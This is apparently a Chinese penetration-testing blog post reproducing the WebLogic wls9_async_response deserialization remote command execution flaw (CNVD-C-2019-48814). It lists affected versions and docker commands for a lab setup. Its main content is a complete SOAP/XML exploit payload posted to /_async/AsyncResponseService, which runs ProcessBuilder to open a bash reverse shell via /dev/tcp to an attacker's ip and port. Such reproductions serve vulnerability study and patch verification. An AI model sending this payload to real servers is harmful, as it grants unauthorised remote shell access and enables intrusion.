Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814)

OnionT@KillBoy 渗透测试评论12,3542字数 1242阅读4分8秒阅读模式

漏洞概述:
该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/_async/AsyncResponseService路径下传入构造好的恶意xml格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,从而可以getshell

漏洞版本:
WebLogic 10.3.6.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0

漏洞搭建:
docker快速搭建,访问7001登录页面及成功
1.docker pull ismaleiva90/weblogic12
2.docker run -d -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814)
漏洞复现:

  • Linux
    首先访问/_async/AsyncResponseService来判断是否启用该组件

Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814)
也可以用namp插件进行扫描weblogic.nse
Weblogic wls9_async_response 反序列化远程命令执行漏洞(CNVD-C-2019-48814)
向/_async/AsyncResponseService发送XMLPoc,连接类型content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">    <soapenv:Header>  <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>

即可成功反弹shell

http://www.oniont.cn/index.php/archives/216.html

免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。
高性能云服务器2折起
 
OnionT@KillBoy
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: